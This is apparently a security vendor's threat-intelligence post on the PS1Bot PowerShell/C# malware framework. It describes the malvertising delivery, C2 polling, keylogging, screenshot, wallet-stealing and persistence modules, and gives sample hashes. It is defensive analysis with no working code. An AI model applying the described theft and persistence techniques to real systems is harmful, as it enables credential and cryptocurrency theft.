Insights, news, education and announcements from PolySwarm

PS1Bot Malware Framework

Written by The Hivemind | Aug 22, 2025 5:48:23 PM

Verticals Targeted: Not specified
Regions Targeted: Not specified
Related Families: AHK Bot, Skitnet/Bossnet

Executive Summary

PS1Bot is a sophisticated PowerShell and C# framework that leverages malvertising to deliver modular malicious components, including information stealers and keyloggers, with a focus on stealing cryptocurrency wallet data. Its in-memory execution and minimal disk footprint enhance its stealth, posing a significant threat to enterprise security.

Key Takeaways

  • PS1Bot employs a modular design with PowerShell and C# components, enabling information theft, keylogging, and persistent system access.  
  • The malware uses malvertising and SEO poisoning to distribute compressed archives containing malicious JScript downloaders.  
  • In-memory execution techniques minimize persistent artifacts, complicating detection and analysis.  
  • The information stealer targets cryptocurrency wallet data, browser credentials, and sensitive files using embedded wordlists.

What is PS1Bot?

Cisco Talos reported on a sophisticated malware campaign active throughout 2025, deploying a multi-stage framework dubbed PS1Bot, implemented in PowerShell and C#. This campaign leverages malvertising and SEO poisoning to distribute malicious compressed archives, which serve as the initial infection vector. PS1Bot’s modular design supports a range of malicious activities, including information theft, keylogging, screen capture, and persistent system access, with a particular focus on exfiltrating cryptocurrency wallet data. Its use of in-memory execution techniques enhances stealth, minimizing persistent artifacts on infected systems, making it a formidable challenge for malware analysts and enterprise security teams.

The campaign begins with victims receiving compressed archives disguised as legitimate files. These archives, often delivered via malvertising or SEO poisoning, contain a JScript file named “FULL DOCUMENT.js,” which functions as a downloader. This file, typically obfuscated VBScript, retrieves a JScript scriptlet from an attacker-controlled server. The scriptlet sets up the environment by writing a PowerShell script to `C:\ProgramData\`, which then polls a command-and-control (C2) server using the system’s C: drive serial number to construct dynamic URLs. This script executes additional PowerShell content via Invoke-Expression (IEX), enabling continuous C2 communication with periodic Sleep() delays.

PS1Bot’s modular architecture includes several purpose-built components. The antivirus detection module queries Windows Management Instrumentation (WMI) to identify installed security products, transmitting results to the C2 server via HTTP GET requests with URL parameters. The screen capture module dynamically compiles a C# assembly to generate screenshots, saving them as JPEGs in `%APPDATA%` before encoding and exfiltrating them via HTTP POST. The keylogger module, also using C# compilation, employs `SetWindowsHookEx()` to capture keystrokes and clipboard data, relaying them to the C2 server. The information collection module gathers system details like domain membership via WMI queries, aiding attacker reconnaissance.

The “grabber” module is particularly notable for targeting cryptocurrency-related data. It scans for browser credentials, cryptocurrency wallet extensions, and local wallet applications. Using embedded wordlists, including English and Czech variants, it identifies files containing passwords or wallet seed phrases, compressing and exfiltrating them via HTTP POST. The persistence module ensures longevity by creating randomly named PowerShell scripts, shortcuts, and LNK files in `%PROGRAMDATA%` and the Startup directory, re-establishing C2 communication post-reboot.

PS1Bot shares architectural similarities with AHK Bot and overlaps with Skitnet/Bossnet in C2 infrastructure and code design, particularly in URL construction and persistence mechanisms. Its heavy reliance on in-memory execution and dynamic compilation reduces its disk footprint, complicating traditional detection methods. The campaign’s frequent updates and modular flexibility indicate an evolving threat requiring robust endpoint and network monitoring. PolySwarm analysts consider PS1Bot to be an emerging and evolving threat.

IOCs

PolySwarm has multiple samples associated with this activity.

 

9304ff7136c030896973b0192c3ff02d47daaae9aa04db80a980df5c8eaffd91

780ea1c97bbfe745628415aa0049c9febfcf56857a3482e910289ff229e6b7f5

107afca60912befade2b9867167135da0a8658e6eb515330b064a9db73a562ac

1c0f9d45e5fd0858eed93c36d9fb2ed8fd30a3fc9f0a58c1fa5c38bc32a9cf07

21a56e1b10037c794a7eac52d71b063b76b0ff2e92af507d2f8d9f87402b721c

2616e7157017331e10f932ae45bccdde091c724aca5496b069b17fd42f952a4b

42fe9d401dd68ddfde23e89a7a4c08125dc0aa121cdfe930589798a92b4262cf

705b51c3ccd0bd375a65fa1e80acfef80709b50b2a7d54b487309f49e9a92f11

76e60c2bad2d4ff20845dc9b4fc969fda6be34531ead2e53568b917fc815ae36

7b89423831873906aa3f28507d1adbcca92b37dbb8a9be4f2d753ebc31467f33

7c5f964dda057e8f5bc7f81204bfb3f607191e7250cc60eb0c0fd69ee83f62c2

84147b1bd16218d165b5fc6b72040a69f10fdc9c654ca056e997cec18638b4ff

87d493b325177b038f068819b9efbdaf7596e252cc0cdc421b831226e9e20500

b3c7b3bf625fdce478c0e5def4ab43f8d9e427dfacac7d37f143b3aae0050118

c09dffd32f233b9d65fe73432cfa29c1de9ea56cfd2f42b985f5e0cccfc0aa4f

c2a0e65177b941424183f97329fa78bd28696aa928e3a26b7a58088e44e3e4f6

e3c943ad9ff6a43c88b7d977f207b85c8c2cfd0c69d582e748cf58419d5bc188

ef9456ada1d93e7cfc1750be1afd68807d532b6e893edd5ad79f016affd29dd0

048b2bafb871b586e895a0749ca74a6ebf47d1901b35730097c7a981d868772e

1e437075ff88f4ab33447a14683a9304dcb0bdb6cc52f2cff065f404a949e3fb

1fe0138168469fb6d3f0f07f848499057d8990879d7ae2cddcd9345faa335dc7

34804cb36531f1871c0a51e5163bfd639b97c7fe4d1604295c326e08e1afadd9

36c3affc545476d2c5db29fcf9129849706ae41bd54894b7eb5dfe8c6b670b4b

41c8b2709640428746aca1e842d99db237a91f9cf948396303c8b73e90b785a0

45ba535ccd969263b74ddc571efe3ae023fba2b9567ac272967f92e799c7f83c

48eb1c7586732005ab6da8644e550c7aa75fa382d1cc27e82ed43ca953604078

49f323dbe82ec8452b8e205bc7aa0925bc9f48f2b4ebf66e3c54a9e3b08d5be5

5afbfd477f803d1b0de651c1a16ffb7c698ba4033258276b8e19bfa749b3ffb5

70da9f738fcc760986e0ed4f76f84800d3a038f672c64683a1d5323043da76e9

7270dfd6bd579283f4f2cb5654de644491d29812109ae51a71886241cb824395

90a81e6dd69c7f01bbd6bf74e259a1374bfe362bd23445532cf8d044b9739f8b

9b3a0f109f96dbc74f65cf464cdc92760c1aaec1cda55d5bf39e6359bebbfedf

9cc1657fa9f056a7b34009c71d376f9af41e3b2505e0e3ecca536c806c5eeda4

a2cca39a4bcd12b6213334d7bc7cfced07636d24a760b7a8e39f05b85bf86caf

af339fc0bc2ac4f7618021c9560586164d55c8aa5fa1d1ac740e30739c0ff425

b82710fc1422c5d94c68999e4fa9f90bf49ec7927636eb12be5933ef0690f354

b9f5dc18641151bf70bab31f2acd3409bc149ca8ff9fcb4edd8e20c0311157bd

ba3aed3af58569b8bf6bafbd360aa73bc777e81ee2783b7b0dcb956ea6b82df0

c025ff463278744795798abc7ed404f38cf167a447cbd4c0fde7f9a4b2dd0ccc

c52f4f652442ff142c00989e919f43387fb4779964fadc458ec80886727e55be

cab6a14f345a6a8404160825d91240ba24c6dccaca6b90da096f05406fcb4935

cd875cd6c18697b401e0ed103e1d9a5f2d047ec22fa2b772fe3c4dfec6952151

f1414ace7527119aa69ea6c18de4d3ae073a306c9c3d63cd1d279059a5077bc4

f966b7fa2ad4efc87cebb2fe2ac1fcbb21ef22b945dbd44aea9706791537b671

fab53f1bceaeedb7f84a031346a0ef840328cd28aeb984e34f2434a9d3475237

fdb7373fdcdb59b744e5b4e8369a2ba1c210449aa63dccde3f3546c790701804

ff2933aa3eb4b43ad93e798feec1d3699ce7b75497ed893942e742b3d2514b67

33621b2d12a898e4a78b7e5e1dc59506a9fe3b0fb4fe2ff33c32795ea5b312a6

01a94f7403e9e8cbe1cab08c4a1730e79e129d4c24193100292f69ed0d1979a9

a3730e2dbcaf2bd3dea2c57c945175480577fe00ed5ece7a16f53fc2b2a36869

9a5685effadb8c63cea8b14115402ad3cfe721984b68726f8afd4f4b38e00a8b

d2a9a3fdf016e9f0f32671d2dfdfe5fa6f66541822d6c0278ccf8ce9eba94db8

291700be999ed8d361e9418a3375353c384999afc42271affa7ecc395f137fc0

ec513db1dcd045444fb7282f382786d91ed3357d254797afacec8b7bab1f5070

b5a97bc726b26c05d76eb6c51505d1e3fe18eeb7177e2be25854e6d84bda7a02

5c569c68ec4085607b7c23854105a9255dd4290c8ed43f1d95141f77db4e4781

e899206a07b322cb69f659a112fd508911bd92be40cfcef4773fcf8b43ce93f9

244e511e0699fe0b6722244dbe66026597bdf5b4369c9c66f846a3f49b438341

8a1b2bee78a30f2f119a37a0e024b47fb21572f6f7e02444302889fc1bd75686

0e415f71530b9d65e9804d8bc3fb12f53d26e6c27919db32c8a2924e437ecaa7

5bba8e7b6f31b3bdd2db9562b327e5e464867aeb436c268957ecee9690db181d

6bf52b79adbd2b79118700810b8437e2ec2e5e19d599e4e068c8f6f0d76ffc1a

ca4e3ab9ea7b85ba81e0141fee19c67d91832155a11c0b378e58749010ff243b

07b8120b557816182ea185e9d20b61445601c20c874761c41c4ab9a12d596886

ee2385867241917960d21cc66b9c58aab8a62d2b203f725458771b3ee7794c80

1b3e8dc1f493b8e9bd8cbe1aa948acef8e6aac41f480bff76075327dbe66652b

de5022893af502a25ae5f37cfa80783df798d578bb5d69facfd631055cd0f2b5

 

You can use the following CLI command to search for all PS1Bot samples in our portal:

$ polyswarm link list -f PS1Bot

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 
View full post